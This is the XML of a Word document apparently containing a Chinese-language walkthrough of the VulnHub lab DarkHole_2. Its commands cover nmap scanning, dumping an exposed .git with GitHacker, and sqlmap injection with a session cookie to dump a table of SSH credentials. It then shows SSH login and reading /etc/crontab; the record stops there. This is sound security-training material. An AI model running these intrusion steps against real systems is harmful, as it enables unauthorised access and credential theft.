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77C69" w14:textId="14ED4614" w:rsidR="001D6777" w:rsidRDefault="00DC48E6">
      <w:r w:rsidRPr="00DC48E6">
        <w:t>DarkHole_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8468BB" w14:textId="7FED30B1" w:rsidR="00DC48E6" w:rsidRDefault="0056526C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="009D46EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://vulnhub.com/entry/darkhole-2,740/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02821CF7" w14:textId="77777777" w:rsidR="0056526C" w:rsidRDefault="0056526C"/>
    <w:p w14:paraId="614FDD53" w14:textId="77777777" w:rsidR="0056526C" w:rsidRDefault="0056526C"/>
    <w:p w14:paraId="56C3EFD2" w14:textId="59B8554E" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB8615" w14:textId="7F74D9FE" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5CDA7" w14:textId="3BF0103B" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r w:rsidRPr="0056526C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03AB6AA6" wp14:editId="2A5DF169">
            <wp:extent cx="5274310" cy="1297305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1490276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76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D970" w14:textId="270C569C" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632A9D7" w14:textId="41619A41" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056526C">
        <w:t xml:space="preserve"> --min-rate 10000 -p- 192.168.21.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1575EB4F" w14:textId="09C50F8A" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r w:rsidRPr="0056526C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1E0BF" wp14:editId="7C95EFFB">
            <wp:extent cx="5274310" cy="1972945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1494600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0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D83A" w14:textId="09EF538C" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1C614" w14:textId="3CE8D230" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056526C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056526C">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056526C">
        <w:t xml:space="preserve"> -O -p22,80 192.168.21.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5D804" w14:textId="276C895A" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r w:rsidRPr="0056526C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DDF806" wp14:editId="538E23A4">
            <wp:extent cx="5274310" cy="2452370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="885752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52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3F6A" w14:textId="6D5EF808" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07B5E0" w14:textId="7C623C5B" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056526C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0056526C">
        <w:t xml:space="preserve"> --script=vuln -p22,80 192.168.21.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34DA22" w14:textId="7AFC8BBE" w:rsidR="0056526C" w:rsidRDefault="0056526C">
      <w:r w:rsidRPr="0056526C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="458A0244" wp14:editId="789457B2">
            <wp:extent cx="5274310" cy="4543425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="517348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48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FD54" w14:textId="09172035" w:rsidR="0056526C" w:rsidRDefault="00046A51">
      <w:r w:rsidRPr="00046A51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="573B58BC" wp14:editId="16FF47E4">
            <wp:extent cx="5274310" cy="2785110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="141524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4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ACA9" w14:textId="715E548C" w:rsidR="00046A51" w:rsidRDefault="00046A51">
      <w:r w:rsidRPr="00046A51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADE66B6" wp14:editId="4B80B051">
            <wp:extent cx="5274310" cy="4081145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="777298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983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E7BE" w14:textId="77777777" w:rsidR="00A048B3" w:rsidRDefault="00A048B3">
      <w:r w:rsidRPr="00A048B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CCABFF1" wp14:editId="39326E9F">
            <wp:extent cx="4640982" cy="2019475"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1179657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7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6419" w14:textId="19E544ED" w:rsidR="006B7095" w:rsidRDefault="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有git源码泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35871E78" w14:textId="07B5709F" w:rsidR="006B7095" w:rsidRDefault="006B7095" w:rsidP="006B7095">
      <w:r>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="009D46EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://gitcode.net/mirrors/WangYihang/GitHacker.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="568715D7" w14:textId="211B4F69" w:rsidR="006B7095" w:rsidRPr="006B7095" w:rsidRDefault="006B7095" w:rsidP="006B7095">
      <w:r w:rsidRPr="006B7095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC2301C" wp14:editId="6E37F9EC">
            <wp:extent cx="5274310" cy="760730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="2065553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53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9174" w14:textId="747BD15C" w:rsidR="006B7095" w:rsidRDefault="006B7095" w:rsidP="006B7095">
      <w:r>
        <w:t>python3 -m pip install -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> https://pypi.org/simple/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GitHacker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B176B6D" w14:textId="6E675344" w:rsidR="006B7095" w:rsidRDefault="006B7095" w:rsidP="006B7095">
      <w:r w:rsidRPr="006B7095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF2506B" wp14:editId="4CECD9B5">
            <wp:extent cx="5274310" cy="3733165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1097718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182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FAD9" w14:textId="70BE0B1C" w:rsidR="006B7095" w:rsidRDefault="006B7095" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爬下网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27152FAA" w14:textId="4FD4576D" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0041235C">
        <w:t>githacker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0041235C">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0041235C">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0041235C">
        <w:t xml:space="preserve"> http://192.168.21.145/.git/ --output-folder 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258AF204" w14:textId="2EE47344" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D26CEFF" wp14:editId="18D7B3A3">
            <wp:extent cx="5274310" cy="4328160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="229461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61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4925" w14:textId="2B87BFB6" w:rsidR="006B7095" w:rsidRDefault="006B7095" w:rsidP="006B7095">
      <w:r w:rsidRPr="006B7095">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11D27E2A" wp14:editId="08CBF41B">
            <wp:extent cx="5274310" cy="2519045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1526482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827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E991" w14:textId="69F67E01" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304CCF32" wp14:editId="4EA5FF6E">
            <wp:extent cx="5274310" cy="5981065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1827704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04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B5DB" w14:textId="036387D0" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>看一下git的log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572812FD" w14:textId="56D545D1" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EE44CA6" wp14:editId="34CF20F1">
            <wp:extent cx="5274310" cy="2121535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1973581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816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5823" w14:textId="04105312" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014F8E4B" wp14:editId="641281ED">
            <wp:extent cx="4412362" cy="1287892"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1651077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774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8D11" w14:textId="7FA8D444" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里添加了默认凭据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C871FCA" w14:textId="5819E038" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73BBA4B3" wp14:editId="0D750291">
            <wp:extent cx="5274310" cy="5815330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="798327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277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BDCC" w14:textId="657FABDC" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DF0F208" wp14:editId="73BC0A0F">
            <wp:extent cx="5274310" cy="2153920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="680970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709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9548" w14:textId="424B0C27" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿到账号，登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40749A" w14:textId="70C7C704" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r w:rsidRPr="0041235C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2AD7D8" wp14:editId="6BEE777F">
            <wp:extent cx="5274310" cy="2596515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1387197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976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B193" w14:textId="08373BD8" w:rsidR="0041235C" w:rsidRDefault="0041235C" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看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好像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</w:t>
      </w:r>
      <w:r w:rsidR="00603939">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这里需要cookie）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296F10D" w14:textId="1D9F1C92" w:rsidR="0041235C" w:rsidRDefault="00603939" w:rsidP="006B7095">
      <w:r w:rsidRPr="00603939">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C17DE09" wp14:editId="64390DD9">
            <wp:extent cx="5274310" cy="2444750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1871033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33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D1FE" w14:textId="71B9E58B" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD59703" w14:textId="6B469888" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t xml:space="preserve"> -u 'http://192.168.21.145/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>dashboard.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t>=1' --cookie PHPSESSID=ijknqu3csgm32ru7rqkd8nov6o -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00603939">
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09C676" w14:textId="170717E7" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="006B7095">
      <w:r w:rsidRPr="00603939">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062CAF78" wp14:editId="6B11EE19">
            <wp:extent cx="5274310" cy="5349875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1865740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402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BEE3" w14:textId="1F5C8A24" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="006B7095">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2C7D3" w14:textId="40561646" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t xml:space="preserve"> -u 'http://192.168.21.145/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>dashboard.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t xml:space="preserve">=1' --cookie PHPSESSID=ijknqu3csgm32ru7rqkd8nov6o -D darkhole_2 --tables </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00603939">
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B69E1FC" w14:textId="4A4D1AB2" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00603939">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B05F68F" wp14:editId="437D174B">
            <wp:extent cx="5274310" cy="5313680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="174754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4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E909" w14:textId="4E29289E" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A752E20" w14:textId="276E15B1" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t xml:space="preserve"> -u 'http://192.168.21.145/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603939">
        <w:t>dashboard.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603939">
        <w:t xml:space="preserve">=1' --cookie PHPSESSID=ijknqu3csgm32ru7rqkd8nov6o -D darkhole_2 -T users --columns </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00603939">
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F50A962" w14:textId="3C424FCE" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00603939">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FC612F" wp14:editId="17E50A48">
            <wp:extent cx="5274310" cy="6022340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="925549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497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0684" w14:textId="7F325D74" w:rsidR="00603939" w:rsidRDefault="00603939" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不对因该是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64D2E418" w14:textId="693D4CFE" w:rsidR="00603939" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t xml:space="preserve"> -u 'http://192.168.21.145/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>dashboard.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t xml:space="preserve">=1' --cookie PHPSESSID=ijknqu3csgm32ru7rqkd8nov6o -D darkhole_2 -T </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t xml:space="preserve"> -columns -dump </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1177FD87" w14:textId="4E0812C7" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C52F77" wp14:editId="57724E9D">
            <wp:extent cx="5274310" cy="5671820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1818932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322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23D2" w14:textId="12726D11" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来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登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727692BD" w14:textId="5C815A7C" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="009D46EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>jehad@192.168.21.145</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FBF4F59" w14:textId="43FE247B" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CA679E" wp14:editId="20832495">
            <wp:extent cx="5274310" cy="4277360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="99490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078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5864" w14:textId="49AEA2EC" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A44AA5" w14:textId="4B73290B" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BFA6271" wp14:editId="77FAAF78">
            <wp:extent cx="5274310" cy="342265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1773679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790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39DC" w14:textId="71F8A0B6" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D3B33B" w14:textId="469DCB7C" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9439BA" wp14:editId="52E90653">
            <wp:extent cx="5274310" cy="6048375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1406106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068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A2D2" w14:textId="0B373AFE" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有东西，这里也进行了计划任务，去看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622ABC5B" w14:textId="17CF8E74" w:rsidR="007B1CEE" w:rsidRDefault="007B1CEE" w:rsidP="00603939">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1CEE">
        <w:t>/crontab</w:t>
      </w:r>
    </w:p>
